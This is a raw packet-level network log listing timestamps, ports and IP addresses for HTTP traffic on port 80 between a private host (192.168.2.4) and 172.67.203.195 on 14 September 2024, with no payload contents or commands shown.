Sep 14, 2024 18:31:09.251697063 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251728058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251735926 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251739025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251759052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251791000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251831055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251842976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251852989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251863003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251873016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251883030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251914978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.251929045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251940012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251950026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251960039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251970053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.251980066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252011061 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252024889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252036095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252048016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252079010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252084970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252090931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252154112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252197981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252208948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252218962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252228975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252238989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252250910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252252102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252260923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252283096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252311945 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252312899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252362967 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252382040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252393007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252404928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252446890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252496958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252506018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252516031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252525091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252536058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252545118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252554893 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252587080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252630949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252641916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252651930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252661943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252672911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252684116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252695084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252727032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252749920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252758026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252769947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252782106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252791882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.252825022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.252855062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.253957033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.253967047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.253978014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254029036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.254034996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254046917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254057884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254065037 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.254070044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254096031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.254127979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.254160881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254173040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254182100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254192114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254200935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254211903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254215002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.254224062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.254240990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.254331112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.292351007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.292360067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.292370081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.292411089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.292419910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.292429924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.292462111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.292473078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.292531013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.292612076 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.335716963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.335725069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.335736036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.335797071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.335805893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.335822105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.335833073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.335874081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.335874081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.335910082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.335944891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.336498976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.336513996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.336523056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.336606979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.336616993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.336627960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.336637020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.336647987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.336658955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.336694002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.337879896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.337889910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.337899923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.337963104 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338001013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338011026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338021040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338031054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338041067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338052034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338105917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338115931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338124990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338134050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338144064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338154078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338160992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338212013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338248014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338258982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338269949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338299036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338403940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338413954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338429928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338438988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338449001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338458061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338468075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338466883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338520050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338536978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338538885 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338550091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338562012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338608980 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338645935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338654995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338660002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338663101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338735104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338745117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338754892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338772058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338781118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338790894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338807106 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338834047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.338959932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338977098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.338990927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339030027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339030981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339040041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339051008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339061022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339107037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339118004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339170933 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339202881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339206934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339219093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339257002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339291096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339301109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339310884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339319944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339329004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339346886 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339401960 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339464903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339498997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339509010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339555025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339602947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339612961 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339622974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339632034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339643002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339664936 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339694977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339776039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339786053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339795113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339802980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339812994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339822054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339832067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339832067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339869976 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339870930 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339915037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339924097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339934111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.339962959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.339993000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.340017080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.340028048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.340037107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.340045929 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.340055943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.340095997 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.340162039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.340174913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.340183973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.340193033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.340202093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.340221882 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.340255022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.341145039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341155052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341164112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341173887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341178894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341182947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341193914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341202974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341207981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341213942 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.341217041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341228962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341249943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.341296911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341306925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341315031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.341332912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.341366053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.379548073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.379559040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.379571915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.379590988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.379637003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.379647017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.379656076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.379663944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.379762888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.379848003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.422823906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.422854900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.422866106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.422877073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.422887087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.422897100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.422907114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.422920942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.423228979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.423492908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.423526049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.423536062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.423610926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.423609972 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.423621893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.423655987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.423671007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.423742056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.423774958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.424685955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424722910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424736023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424761057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.424808025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424818993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424829006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424839020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424853086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.424884081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.424887896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424900055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424907923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.424911022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424947023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424957991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424962044 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.424968958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424979925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424988985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.424999952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425039053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425048113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425051928 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425093889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425220013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425230026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425263882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425304890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425316095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425326109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425358057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425389051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425452948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425463915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425473928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425483942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425494909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425504923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425513983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425515890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425528049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425537109 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425556898 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425586939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425600052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425611019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425621033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425695896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425718069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425734043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425740004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425745010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425750017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425760031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425765038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:09.425828934 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425863981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:09.425872087 CEST	80	49738	172.67.203.195	192.168.2.4
